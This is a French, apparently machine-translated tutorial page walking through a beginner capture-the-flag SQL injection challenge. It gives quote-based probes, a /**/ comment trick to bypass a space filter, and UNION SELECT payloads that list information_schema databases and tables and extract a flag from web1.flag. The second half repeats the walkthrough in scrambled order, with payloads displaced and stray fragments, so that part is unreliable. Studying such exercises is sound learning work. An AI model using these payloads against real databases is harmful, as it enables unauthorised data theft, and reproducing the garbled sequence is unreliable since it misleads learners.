Maison > base de données > tutoriel mysql > le corps du texte

Exemples simples liés à l'injection SQL

巴扎黑
Libérer: 2017-08-11 15:11:05
original
2896 Les gens l'ont consulté

La soi-disant injection SQL consiste à insérer des commandes SQL dans les soumissions de formulaires Web ou à saisir des noms de domaine ou des chaînes de requête pour les requêtes de page, incitant finalement le serveur à exécuter des commandes SQL malveillantes. Ensuite, je vais partager avec vous une simple injection SQL, jetons un coup d'oeil

La soi-disant injection SQL consiste à insérer des commandes SQL dans les soumissions de formulaires Web ou à saisir des chaînes de requête pour les noms de domaine ou les demandes de page, et finalement tromper le serveur. Exécuter des commandes SQL malveillantes. Plus précisément, il s'agit de la possibilité d'utiliser des applications existantes pour injecter des commandes SQL (malveillantes) dans le moteur de base de données principal en vue de leur exécution. Il peut obtenir des informations sur un site Web présentant des vulnérabilités de sécurité en saisissant des instructions SQL (malveillantes) dans un formulaire Web. que d'exécuter des instructions SQL comme prévu par le concepteur. Par exemple, de nombreux sites Web de cinéma et de télévision ont divulgué les mots de passe des membres VIP, principalement en soumettant des caractères de requête via des formulaires WEB. Ces formulaires sont particulièrement vulnérables aux attaques par injection SQL.

Entrez 1, 2 et 3 respectivement et il y aura des résultats correspondants

L'utilisation de ' signalera une erreur, donc

construit instructions SQL couramment utilisées : 1' et '1'='1

Aucune réponse Essayez 1' et '1'='2

Toujours pas de réponse, info-bulle, il devrait filtrer quelque chose, essayez de changer l'instruction SQL

1and1=1

peut afficher choses, après avoir jugé et filtré les espaces, nous avons utilisé /**/ pour remplacer les espaces

essayez 1'/**/'1'='1

Trouvé un résultat :

Puis construit l'instruction sql :

Déterminez quelles bases de données existent :


1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
Copier après la connexion
Copier après la connexion

Vous pouvez voir les résultats :

Voir quels sont les tableaux de données :


1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
Copier après la connexion
Copier après la connexion

J'ai trouvé la table flag, nous supposons qu'elle devrait être dans la base de données web1 et le champ est flag (en fait dans la base de données sur cette page)

Donc :


1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
Copier après la connexion
Copier après la connexion

Je suis également un débutant. J'ai fait référence aux WP de nombreux experts. J'espère que vous signalerez d'éventuelles erreurs. après les avoir écrits. Merci !

Selon les invites de la page, qu'est-ce qui est filtré exactement....

Entrez 1, 2 et 3 respectivement pour obtenir ? les résultats correspondants

L'utilisation de ' signalera une erreur, donc

construit les instructions SQL couramment utilisées : 1' et '1'='1

Pas de réponse, essayez 1' et '1'='2

Toujours pas de réponse, info-bulle, ça devrait être en filtrant quelque chose, modifiez l'instruction SQL et essayez Try

1and1=1

pour afficher les choses Après jugement, les espaces sont filtrés.*/et/**

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
Copier après la connexion
Copier après la connexion
*
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
Copier après la connexion
Copier après la connexion
*/'1'='1

et avons trouvé le résultat :

Ensuite, construisez l'instruction sql :

Déterminez quelles bases de données existent :


Vous pouvez voir le résultat :
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
Copier après la connexion
Copier après la connexion

Vérifiez quels tableaux de données sont présents :


Nous J'ai trouvé la table flag. Je suppose qu'elle devrait être dans la base de données web1 et que le champ est flag (en fait dans la base de données de cette page)

Donc :


Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal
À propos de nous Clause de non-responsabilité Sitemap
Site Web PHP chinois:Formation PHP en ligne sur le bien-être public,Aidez les apprenants PHP à grandir rapidement!